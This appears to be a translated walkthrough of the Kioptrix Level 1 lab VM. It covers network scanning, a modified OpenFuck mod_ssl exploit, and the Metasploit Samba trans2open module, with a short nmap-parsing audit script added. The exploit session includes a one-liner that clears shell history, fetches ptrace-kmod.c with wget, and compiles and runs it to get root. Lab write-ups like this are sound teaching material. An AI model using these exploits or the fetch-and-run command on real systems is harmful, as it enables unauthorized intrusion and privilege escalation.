Information Gathering

Discover the target host's IP address with netdiscover.

root@kali:~# netdiscover 

Currently scanning: 192.168.63.0/16 | Screen View: Unique Hosts

3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.43.1 ac:c1:ee:31:3f:25 1 60 Xiaomi Communications Co L
192.168.43.33 44:03:2c:68:d8:0f 1 60 Intel Corporate
192.168.43.54 00:0c:29:7c:3a:16 1 60 VMware, Inc.

From the scan output, the target host's IP address is 192.168.43.54.

Scan the host's ports and services with nmap: nmap -A 192.168.43.54

root@kali:~# nmap -A -sS 192.168.43.54

Starting Nmap 7.10 ( https://nmap.org ) at 2018-05-07 15:48
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.43.54
Host is up (0.00055s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1024/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after: 2010-09-26T09:32:06
|_ssl-date: 2018-05-07T07:50:42+00:00; +1m50s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:7C:3A:16 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

TRACEROUTE
HOP RTT ADDRESS
1 0.55 ms 192.168.43.54

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.99 seconds
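The scan above already contains everything a defender needs to prioritise this host: SSHv1, SSLv2, an expired certificate, HTTP TRACE and an end-of-life Apache/OpenSSL stack. The following script is an added example, not part of the original post, that parses a constructed excerpt of that nmap output and flags those findings automatically; the function names and the trimmed input are assumptions.

```python
import re
from datetime import datetime

# Constructed excerpt of the nmap -A output above (assumed input, trimmed to the relevant lines).
NMAP_OUTPUT = """\
Starting Nmap 7.10 ( https://nmap.org ) at 2018-05-07 15:48
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_ Potentially risky methods: TRACE
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_Not valid after: 2010-09-26T09:32:06
| SSLv2 supported
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")
DATE_RE = re.compile(r"\bat (\d{4}-\d{2}-\d{2})")

def parse_services(text):
    """Map port -> service/version plus the NSE script lines ('|' prefixed) that follow it."""
    services, current = {}, None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = services.setdefault(int(m.group(1)), {"service": m.group(3), "version": m.group(4).strip(), "notes": []})
        elif current is not None and line.startswith("|"):
            current["notes"].append(line.lstrip("|_ ").strip())
    return services

def audit(text):
    """Return (port, finding) pairs for legacy protocols, risky methods, expired certs and EOL software."""
    m = DATE_RE.search(text)
    scan_date = datetime.fromisoformat(m.group(1)) if m else datetime.now()
    findings = []
    for port, info in sorted(parse_services(text).items()):
        joined = " ".join(info["notes"])
        if "Server supports SSHv1" in joined:
            findings.append((port, "SSHv1 enabled"))
        if "SSLv2 supported" in joined:
            findings.append((port, "SSLv2 enabled"))
        if "risky methods: TRACE" in joined:
            findings.append((port, "HTTP TRACE enabled"))
        for note in info["notes"]:
            if note.startswith("Not valid after:"):
                # Certificate expiry is compared against the scan date taken from the header line.
                if datetime.fromisoformat(note.split(":", 1)[1].strip()) < scan_date:
                    findings.append((port, "TLS certificate expired"))
        if "Apache httpd 1.3." in info["version"] or "OpenSSL/0.9.6" in info["version"]:
            findings.append((port, "end-of-life web stack: " + info["version"]))
    return findings
```

Running `audit(NMAP_OUTPUT)` yields one finding per weak setting on ports 22, 80 and 443 and nothing for the Samba port, which is flagged separately later in the post.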

443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)

The service on port 443 is mod_ssl/2.8.4 OpenSSL/0.9.6b.

Search for related vulnerabilities with searchsploit mod_ssl

root@kali:~/Desktop# searchsploit mod_ssl
--------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Apache mod_ssl 2.0.x - Remote Denial o | exploits/linux/dos/24590.txt
Apache mod_ssl 2.8.x - Off-by-One HTAc | exploits/multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'Open | exploits/unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'Open | exploits/unix/remote/764.c
Apache mod_ssl OpenSSL < 0.9.6d / < 0. | exploits/unix/remote/40347.txt
--------------------------------------- ----------------------------------------
Shellcodes: No Result

The exploit script for the 4th entry can be used here; download the corresponding exploit from exploit-db.

Exploitation

OpenFuck exploitation

This is a remote overflow vulnerability; the downloaded exploit is quite old and needs some modifications.

  • Compiling requires the libssl-dev library, specifically the version installed by apt-get install libssl1.0-dev
  • Add the header files <openssl/rc4.h> and <openssl/md5.h> to the exploit
  • Replace the URL after wget in the exploit with http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
  • At line 961, change the declaration to const unsigned char * p,* end;

Then compile:

gcc -o OpenFuck 764.c -lcrypto

Run the script ./OpenFuck and choose the entry matching the target system version.

Here 0x6b is chosen.

Run the command ./OpenFuck 0x6b 192.168.43.54

root@kali:~/Desktop# ./OpenFuck 0x6b 192.168.43.54

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f80e0
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
bash-2.05$ unset HISTFILE; cd /tmp; wget http://dl.packetstormsecurity.net/030exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p;
--04:04:37-- http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c [following]
--04:04:38-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

0K ... 100% @ 3.74 MB/s

04:04:39 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

[+] Attached to 6498
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
whoami
root

Samba exploitation

The lab environment has a Samba vulnerability.

enum4linux is used here; it enumerates Windows systems and Samba services over the SMB protocol to obtain a large amount of important information about the target, and its results may include sensitive details such as user accounts, group accounts, shared directories and password policies.

However, in my local environment the Samba version was not detected.

The vulnerability is the Samba trans2open overflow (Linux x86), a buffer overflow found in Samba versions 2.2.0 to 2.2.8.

It can likewise be found with searchsploit.

Here the experiment is done directly in the msf environment.

msf exploit(linux/samba/trans2open) > show options 

Module options (exploit/linux/samba/trans2open):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.43.54 yes The target address
RPORT 139 yes The target port (TCP)


Payload options (linux/x86/shell_bind_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 192.168.43.54 no The target address


Exploit target:

Id Name
-- ----
0 Samba 2.2.x - Bruteforce

msf exploit(linux/samba/trans2open) > exploit

[*] Started bind handler
[*] 192.168.43.54:139 - Trying return address 0xbffffdfc...
[*] 192.168.43.54:139 - Trying return address 0xbffffcfc...
[*] 192.168.43.54:139 - Trying return address 0xbffffbfc...
[*] 192.168.43.54:139 - Trying return address 0xbffffafc...
[*] Command shell session 2 opened (192.168.43.177:33375 -> 192.168.43.54:4444) at 2018-05-07 04:47:42 -0400

id
uid=0(root) gid=0(root) groups=99(nobody)

Summary

Although this lab environment is fairly old and some of these vulnerabilities are rarely found in real-world engagements, the exploitation process still teaches the use of several Kali Linux tools and some practical ways of thinking.